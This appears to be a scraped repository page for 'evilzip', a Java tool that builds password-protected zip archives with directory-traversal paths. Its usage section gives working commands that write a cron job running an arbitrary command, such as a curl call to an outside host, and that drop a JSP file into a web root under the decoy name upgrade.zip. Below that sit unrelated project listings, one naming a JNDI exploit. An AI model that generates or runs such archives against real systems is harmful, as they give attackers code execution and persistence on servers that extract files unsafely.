evilzip lets you create a zip file(with password) that contains files with directory traversal characters in their embedded path.

Related tags

Security evilzip
Overview

evilzip

logs

  • 20210701 修改权限问题,让解压后的文件默认就有读写执行的权限。

About

evilzip lets you create a zip file(with password) that contains files with directory traversal characters in their embedded path. Most commercial zip program (winzip, etc) will prevent extraction of zip files whose embedded files contain paths with directory traversal characters. However, many software development libraries do not include these same protection mechanisms (ex. Java, PHP, etc). If a program and/or library does not prevent directory traversal characters then evilzip can be used to generate zip files that, once extracted, will place a file at an arbitrary location on the target system.

关于项目

原使用的创建恶意压缩包的工具evilarc不支持带密码的压缩包,且没法修改,因为其使用的zipfile模块不支持加密码压缩,所以就有了这个项目。在evilarc的基础上新增了一些自己常用的功能,比如仅需一个参数就生成可以穿越到unix系统计划任务的压缩包。

具体参数如下:

╭─ fucker ~/Coding/Java/Intellij/evilzip/
╰─ java -jar evilzip.jar -h
Usage: java -jar EvilZip.jar [options]
  Options:
    -f, --file
      File to input archive.
      Default: root
    -p, --path
      Path to include in filename after traversal
      Default: var/spool/cron/
    -pwd, --password
      ZIP file encrypt password.
    -o, --output
      File to output archive.
      Default: evil.zip
    -d, --depth
      Number directories to traverse.
      Default: 8
    -t, --type
      OS platform for archive (win|unix).
      Default: unix
    -c, --cmd
      Command to execute.
    -h, --help
      Show this message

一些tips

快速生成在unix系统执行命令的压缩包(目录穿越到计划任务):

java -jar evilzip.jar -c "curl xxx.dnslog.com"

读取本地的gaga.jsp 让其穿越10层目录最终解压到/wwwroot/xxxx/gaga.jsp 解压密码为update-password 输出的压缩包名为upgrade.zip

java -jar evilzip.jar -f gaga.jsp -d 10 -p wwwroot/xxxx/ -o upgrade.zip -t unix -pwd "update-password"

大部分参数均带有默认值,不用指定也行。

You might also like...

Burp Extension for BFAC (Advanced Backup-File Artifacts Testing for Web-Applications)

Burp Extension for BFAC (Advanced Backup-File Artifacts Testing for Web-Applications)

BFAC - Burp Extension Burp Extension for BFAC (Advanced Backup-File Artifacts Testing for Web-Applications). What is BFAC - Burp Extension ? Backup fi

Jul 16, 2022

🟪 TommyBox is a single-file executable that makes it possible to launch web apps on a desktop.

🟪 TommyBox is a single-file executable that makes it possible to launch web apps on a desktop.

🍥 TommyBox About: TommyBox is a standalone executable container that makes it possible to launch static and dynamic web apps on a desktop by providin

May 28, 2022

Multi-platform transparent client-side encryption of your files in the cloud

Multi-platform transparent client-side encryption of your files in the cloud

Supporting Cryptomator Cryptomator is provided free of charge as an open-source project despite the high development effort and is therefore dependent

Jan 5, 2023

Log4shell-hunter - Scanner that scans local files for log4shell vulnerability

Log4shell-hunter - Scanner that scans local files for log4shell vulnerability. Does bytecode analysis so it does not rely on metadata. Will find vulnerable log4j even it has been self-compiled/repackaged/shaded/nested (e.g. uberjar, fatjar) and even obfuscated.

Feb 27, 2022

Example Java Cryptographic License Files

Example of verifying cryptographically signed and encrypted license files using Java, Bouncy Castle, Ed25519 and AES-256-GCM

Apr 1, 2022

Make a customized list of exercises, create and save workouts, and be led through your routine. This application is currently under development.

HIIT Workout Builder ABOUT This application allows you to create and be led through customized high-intensity interval training (HIIT) sessions. The a

Nov 28, 2022

Auto reply app helping you move away from less private messengers like WhatsApp and Facebook Messenger

Auto reply app helping you move away from less private messengers like WhatsApp and Facebook Messenger

Watomatic - Auto reply for WhatsApp so you can stop using it Watomatic sends an automated reply to everyone contacting you on WhatsApp. This is especi

Dec 28, 2022

shiro only provide the support of ehcache and concurrentHashMap. Here is an implement of redis cache can be used by shiro. Hope it will help you!

shiro only provide the support of ehcache and concurrentHashMap. Here is an implement of redis cache can be used by shiro. Hope it will help you!

Dec 18, 2022
Releases(1.1)
Owner
鸭王
Infosec Researcher|Security Developer|Java|C#|Golang|C++
鸭王
Apply class remove process from ear/war/jar/zip archive

The current program remove the class "org/apache/logging/log4j/core/lookup/JndiLookup.class" from your zip, jar, war, ear archive.

Alexandre Heroux 5 Jan 14, 2022
JNDI-Exploit is an exploit on Java Naming and Directory Interface (JNDI) from the deleted project fromthe user feihong on GitHub.

JNDI-Exploit JNDI-Exploit is a fork from the deleted project ftom the user feihong-cs on GitHub. To learn more about JNDI and what you can do with thi

Nil MALHOMME 4 Dec 6, 2022
Jacksum (JAva ChecKSUM) is a free, open source, cross-platform, feature-rich, multi-threaded command line tool for calculating hash values, verifying data integrity, finding files by their fingerprints, and finding algorithms to a hash value.

Jacksum (JAva ChecKSUM) is a free, open source, cross-platform, feature-rich, multi-threaded command line tool for calculating hash values, verifying data integrity, finding files by their fingerprints, and finding algorithms to a hash value.

Johann N. Löfflmann 17 Dec 26, 2022
Password strength estimator

Nbvcxz - Password strength estimator - [] nbvcxz is java library (and standalone console program) which is heavily inspired by the work in zxcvbn. Pas

GoSimple 237 Dec 29, 2022
A small and easy-to-use one-time password generator library for Java according to RFC 4226 (HOTP) and RFC 6238 (TOTP).

OTP-Java A small and easy-to-use one-time password generator for Java according to RFC 4226 (HOTP) and RFC 6238 (TOTP). Table of Contents Features Ins

Bastiaan Jansen 106 Dec 30, 2022
This is an android library to represent password strength.

PasswordStrengthView This is an android library to represent password strength. Preview How to use? Add maven to your project gradle file allprojects

null 33 Jan 3, 2022
Trino UDFs Plugin to encrypt/decrypt values with a password

trino-encrypt-udfs Example of Trino UDFs Plugin to encrypt and decrypt values with a password. Introduction In Trino you can create new Plugins by imp

Victor Coustenoble 10 Dec 13, 2022
A small and easy-to-use one-time password generator library for Java according to RFC 4226 (HOTP) and RFC 6238 (TOTP).

OTP-Java A small and easy-to-use one-time password generator for Java according to RFC 4226 (HOTP) and RFC 6238 (TOTP). Table of Contents Features Ins

Bastiaan Jansen 106 Dec 30, 2022
An Editor for CSGO:botprofile.db, allows you to create&improve your own bot easily.

botprofileEditor An Editor for CSGO:botprofile.db, allows you to create&improve your own bot easily. 最新信息 项目重构,舍弃了原来复杂的结构 项目打算全力制作web版,使用SpringBoot作为开

null 10 Oct 9, 2022
Contains all my research and content produced regarding the log4shell vulnerability

Objective Contains all my research and content produced regarding the log4shell vulnerability. Content Folder "analysis" Contain the information that

Dominique RIGHETTO 30 Oct 28, 2022